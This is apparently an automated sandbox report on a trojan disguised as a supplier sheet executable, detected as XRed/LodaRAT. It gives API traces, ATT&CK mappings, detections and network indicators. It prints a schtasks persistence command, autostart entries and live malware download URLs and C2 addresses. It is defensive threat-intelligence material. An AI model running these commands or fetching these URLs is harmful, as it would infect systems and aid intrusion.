                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D98E19 SetUnhandledExceptionFilter,2_2_00D98E19
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D98E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D98E3C
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00918E19 SetUnhandledExceptionFilter,9_2_00918E19
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00918E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00918E3C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DABE95 LogonUserW,2_2_00DABE95
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D7374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_00D7374E
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB4B52 SendInput,keybd_event,2_2_00DB4B52
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB7DD5 mouse_event,2_2_00DB7DD5
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeProcess created: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe "C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe"
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DAB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_00DAB398
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DABE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_00DABE31
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, DELPQB.exeBinary or memory string: Shell_TrayWnd
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp, DELPQB.exe, 00000009.00000002.1337680948.000000000099E000.00000040.00000001.01000000.00000009.sdmp, DELPQB.exe, 00000015.00000002.1418887961.000000000099E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D97254 cpuid 2_2_00D97254
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D940DA GetSystemTimeAsFileTime,__aulldiv,2_2_00D940DA
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DEC146 GetUserNameW,2_2_00DEC146
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DA2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00DA2C3C
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D8E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00D8E47B
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: Amcache.hve.25.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                Source: Amcache.hve.25.drBinary or memory string: msmpeng.exe
                                Source: Amcache.hve.25.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                Source: Amcache.hve.25.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2490118763.0000000001803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: Amcache.hve.25.drBinary or memory string: MsMpEng.exe
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                                Stealing of Sensitive Information

                                Source: Yara matchFile source: Process Memory Space: ._cache_Supplier 0202AW-PER2 Sheet.exe PID: 7384, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: Supplier 0202AW-PER2 Sheet.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Supplier 0202AW-PER2 Sheet.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Supplier 0202AW-PER2 Sheet.exe PID: 7292, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7412, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXC902.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: ._cache_Supplier 0202AW-PER2 Sheet.exe, 00000002.00000002.2498031591.0000000004D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81!
                                Source: DELPQB.exe, 0000001E.00000002.2350709555.000000000099E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                                Source: DELPQB.exe, 0000001B.00000003.1742892347.00000000041A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                                Source: DELPQB.exeBinary or memory string: WIN_XP
                                Source: DELPQB.exeBinary or memory string: WIN_XPe
                                Source: DELPQB.exeBinary or memory string: WIN_VISTA
                                Source: DELPQB.exe, 00000009.00000003.1304607933.0000000004252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81.`
                                Source: DELPQB.exeBinary or memory string: WIN_7
                                Source: DELPQB.exe, 0000001E.00000003.2338399403.0000000004840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81{
                                Source: DELPQB.exeBinary or memory string: WIN_8
                                Source: Yara matchFile source: Process Memory Space: ._cache_Supplier 0202AW-PER2 Sheet.exe PID: 7384, type: MEMORYSTR

                                Remote Access Functionality

                                Source: Yara matchFile source: Process Memory Space: ._cache_Supplier 0202AW-PER2 Sheet.exe PID: 7384, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: Supplier 0202AW-PER2 Sheet.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Supplier 0202AW-PER2 Sheet.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Supplier 0202AW-PER2 Sheet.exe PID: 7292, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7412, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXC902.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00DC91DC
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DC96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00DC96E2
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009491DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_009491DC
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009496E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_009496E2
                                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information421
                                Scripting
                                2
                                Valid Accounts
                                11
                                Windows Management Instrumentation
                                421
                                Scripting
                                1
                                Exploitation for Privilege Escalation
                                1
                                Disable or Modify Tools
                                11
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                4
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomains1
                                Replication Through Removable Media
                                3
                                Native API
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                Peripheral Device Discovery
                                Remote Desktop Protocol11
                                Input Capture
                                11
                                Encrypted Channel
                                Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                1
                                Extra Window Memory Injection
                                21
                                Obfuscated Files or Information
                                Security Account Manager1
                                Account Discovery
                                SMB/Windows Admin Shares3
                                Clipboard Data
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Scheduled Task/Job
                                2
                                Valid Accounts
                                1
                                Software Packing
                                NTDS4
                                File and Directory Discovery
                                Distributed Component Object ModelInput Capture34
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd21
                                Registry Run Keys / Startup Folder
                                21
                                Access Token Manipulation
                                1
                                DLL Side-Loading
                                LSA Secrets38
                                System Information Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                                Process Injection
                                1
                                Extra Window Memory Injection
                                Cached Domain Credentials1
                                Query Registry
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job
                                12
                                Masquerading
                                DCSync251
                                Security Software Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                                Registry Run Keys / Startup Folder
                                2
                                Valid Accounts
                                Proc Filesystem121
                                Virtualization/Sandbox Evasion
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
                                Virtualization/Sandbox Evasion
                                /etc/passwd and /etc/shadow3
                                Process Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation
                                Network Sniffing11
                                Application Window Discovery
                                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                                Process Injection
                                Input Capture1
                                System Owner/User Discovery
                                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                [Behavior graph. ID: 1582318, Sample: Supplier 0202AW-PER2 Sheet.exe, Startdate: 30/12/2024, Architecture: WINDOWS, Score: 100]

                                Source | Detection | Scanner | Label | Link
                                Supplier 0202AW-PER2 Sheet.exe | 85% | Virustotal | | Browse
                                Supplier 0202AW-PER2 Sheet.exe | 100% | Avira | TR/Dldr.Agent.SH |
                                Supplier 0202AW-PER2 Sheet.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                Supplier 0202AW-PER2 Sheet.exe | 100% | Joe Sandbox ML | |

                                Source | Detection | Scanner | Label | Link
                                C:\Users\user\AppData\Local\Temp\ZMNYQK.vbs | 100% | Avira | VBS/Runner.VPJI |
                                C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH |
                                C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\Users\user\Documents\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
                                C:\Users\user\Documents\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\ProgramData\Synaptics\RCXC902.tmp | 100% | Avira | TR/Dldr.Agent.SH |
                                C:\ProgramData\Synaptics\RCXC902.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
                                C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | 100% | Joe Sandbox ML | |
                                C:\Users\user\AppData\Roaming\Windata\DELPQB.exe | 100% | Joe Sandbox ML | |
                                C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | |
                                C:\Users\user\Documents\~$cache1 | 100% | Joe Sandbox ML | |
                                C:\ProgramData\Synaptics\RCXC902.tmp | 100% | Joe Sandbox ML | |
                                C:\ProgramData\Synaptics\RCXC902.tmp | 100% | ReversingLabs | Win32.Worm.Zorex |
                                C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
                                C:\Users\user\AppData\Roaming\Windata\DELPQB.exe | 55% | ReversingLabs | Win32.Trojan.Lisk |
                                C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe | 55% | ReversingLabs | Win32.Trojan.Lisk |
                                C:\Users\user\Documents\~$cache1 | 100% | ReversingLabs | Win32.Worm.Zorex |
                                No Antivirus matches
                                No Antivirus matches
                                Source | Detection | Scanner | Label | Link
                                http://xred.site50.net/syn/Synaptics.rar | 100% | Avira URL Cloud | malware |
                                http://xred.site50.net/syn/SSLLibrary.dl | 100% | Avira URL Cloud | malware |
                                https://docs.goooZ | 0% | Avira URL Cloud | safe |
                                http://xred.site50.net/syn/SUpdate.ini01 | 100% | Avira URL Cloud | malware |
                                http://xred.site50.net/syn/Synaptics.rar4 | 100% | Avira URL Cloud | malware |
                                https://docs.gooXZ | 0% | Avira URL Cloud | safe |
                                http://xred.site50.net/syn/SSLLibrary.dll | 100% | Avira URL Cloud | malware |
                                http://xred.site50.net/syn/SUpdate.ini | 100% | Avira URL Cloud | malware |
                                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                freedns.afraid.org | 69.42.215.252 | true | false | | high
                                docs.google.com | 216.58.206.46 | true | false | | high
                                drive.usercontent.google.com | 142.250.181.225 | true | false | | high
                                xred.mooo.com | unknown | unknown | false | | high
                                Name | Malicious | Antivirus Detection | Reputation
                                xred.mooo.com | false | | high
                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high

                                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                        http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1RCXC902.tmp.0.drfalse
                                                                              high
                                                                              https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1RCXC902.tmp.0.drfalse
                                                                                high
                                                                                https://docs.google.com/uc?id=0BxsMXSynaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://xred.site50.net/syn/Synaptics.rar4Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978DSupplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://xred.site50.net/syn/SUpdate.iniRCXC902.tmp.0.drtrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://docs.google.com/uc?id=0;Synaptics.exe, 00000003.00000002.1705901782.000000001023E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1709014926.0000000012C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1713766865.00000000156BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1718925846.0000000017FFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1679716664.0000000004C5E000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://xred.site50.net/syn/SSLLibrary.dllRCXC902.tmp.0.drtrue
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.181.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
216.58.206.46 | docs.google.com | United States | 15169 | GOOGLEUS | false
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582318
Start date and time: 2024-12-30 10:57:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 34
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Supplier 0202AW-PER2 Sheet.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@23/49@8/4
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 66.7%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 89
                                                                                          • Number of non-executed functions: 281
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 184.28.90.27, 52.113.194.132, 20.189.173.16, 13.89.179.12, 13.107.246.45, 40.126.32.76, 4.245.163.56
                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, time.windows.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, onedscolprdwus17.westus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com
                                                                                          • Execution Graph export aborted for target Synaptics.exe, PID 7412 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadFile calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
04:58:07 | API Interceptor | 256x Sleep call for process: Synaptics.exe modified
06:00:54 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
06:02:14 | API Interceptor | 17x Sleep call for process: splwow64.exe modified
10:58:01 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
10:58:03 | Task Scheduler | Run new task: ZMNYQK.exe path: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
10:58:09 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ZMNYQK "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
10:58:17 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZMNYQK.lnk
12:00:40 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ZMNYQK "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          172.111.138.100Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                              RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                  Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                    bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                      gry.exeGet hashmaliciousUnknownBrowse
                                                                                                        dlawt.exeGet hashmaliciousLodaRatBrowse
                                                                                                          nXi3rwhMmB.exeGet hashmaliciousLodaRatBrowse
                                                                                                            69.42.215.252zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                            • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            freedns.afraid.orgzhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            blq.exeGet hashmaliciousGh0stCringe, RunningRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ZmrwoZsbPp.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            ccmsetup.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Synaptics.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            RezQY7jWu8.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            Dzsb.Qyd.Install.exeGet hashmaliciousXRedBrowse
                                                                                                            • 69.42.215.252
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            VOXILITYGBloligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 104.250.189.221
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
                                                                                                            RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            • 172.111.138.100
